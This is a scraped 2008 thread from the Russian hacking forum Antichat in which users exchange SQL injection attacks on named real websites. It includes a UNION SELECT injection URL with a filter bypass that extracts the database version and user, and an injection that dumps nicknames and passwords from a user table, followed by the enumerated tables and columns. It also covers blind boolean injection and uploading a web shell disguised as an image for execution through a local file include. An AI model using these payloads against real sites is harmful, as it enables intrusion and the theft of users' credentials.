Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.06.2008, 19:08
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
delete
Последний раз редактировалось Naydav; 30.06.2008 в 01:41..
|
|
|
27.06.2008, 19:11
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
не пойдёт... там же нету вывода на экран результата ... там идёт так...
1 запрос с этим параметром и 2ой запрос
в первом запросе яя подобралк количество полей! но во 2ой это количество не подходит и происходит выполнение вункции die(); с ошибкой mysql
|
|
|
|
27.06.2008, 20:20
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Doom123
не пойдёт... там же нету вывода на экран результата ... там идёт так...
1 запрос с этим параметром и 2ой запрос
в первом запросе яя подобралк количество полей! но во 2ой это количество не подходит и происходит выполнение вункции die(); с ошибкой mysql
Ты представляешь, что такое подзапросы с посимвольным перебором?
Для них не нужен вывод. Это своего рода true/false.
Условие верно-страница вылезла,не верно-ошибка
Твой случай ,если я понял правильно, именно подзапросами и выводится(Да, гиммороя побольше чем с нормальным выводом, но по другому никак)
|
|
|
|
27.06.2008, 21:27
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
Сообщение от Naydav
там под сотню юзеров  , каждый юзер - это походу "сайт"? Да.
Вот, вот этот хостинг http://www.valuehost.ru/
|
|
|
|
29.06.2008, 17:51
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132
Репутация:
63
|
|
http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+union+select+1, 2,3,4,5,6,7,8,9,10/*
Вот что с этим можно сделать?ТАм что то фильтруется ... .
|
|
|
|
29.06.2008, 18:43
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Buffalon
Фильтр слабенький, вот обход:
http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+s elect+1,2,version(),4,5,user(),7,8,9,10
|
|
|
|
29.06.2008, 21:50
|
|
Новичок
Регистрация: 30.05.2008
Сообщений: 4
Провел на форуме:
6739
Репутация:
0
|
|
вопрос.
есть загрузка файлов/картинок
при загрузке меняется только название и расширение файла на жпг. содержимое не меняется
как залить шелл и возможно ли?
|
|
|
|
29.06.2008, 22:34
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Бармалей, если у тебя будет локальный инклуд, то будет и шелл. заливаешь картинку с содержимым шелла, потом инклудишь...
|
|
|
|
29.06.2008, 22:57
|
|
Новичок
Регистрация: 30.05.2008
Сообщений: 4
Провел на форуме:
6739
Репутация:
0
|
|
нету там инклуда(
|
|
|
|
30.06.2008, 14:49
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
Вот проблемка
Нашел Sql раскрутил и вот
Код:
http://www.oke.ru/xo4u.php?id=-42708+UNION+SELECT+1,2,concat_ws(0x3a,nick,passw),4,5,6,7,8,9,10+FROM+chausers/*
но ниче не выводит
Таблицы
Код:
COLLATIONS.
COLLATION_CHARACTER_ SET_APPLICABILITY.
COLUMNS.
COLUMN_PRIVILEGES.
ENGINES.
EVENTS.
FILES.
GLOBAL_STATUS.
GLOBAL_VARIABLES.
KEY_COLUMN_USAGE.
PARTITIONS.
PLUGINS.
PROCESSLIST.
REFERENTIAL_CONSTRAI NTS.
ROUTINES.
SCHEMATA.
SCHEMA_PRIVILEGES.
SESSION_STATUS.
SESSION_VARIABLES.
STATISTICS.
TABLES.
TABLE_CONSTRAINTS.
TABLE_PRIVILEGES.
TRIGGERS.
USER_PRIVILEGES.
VIEWS.
chamess.
chamess_old1.
charooms.
chausers.
mess.
wants.
Колонки в chausers
Код:
idate
nick
email
chalogid
lastdate
roomid
passw
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
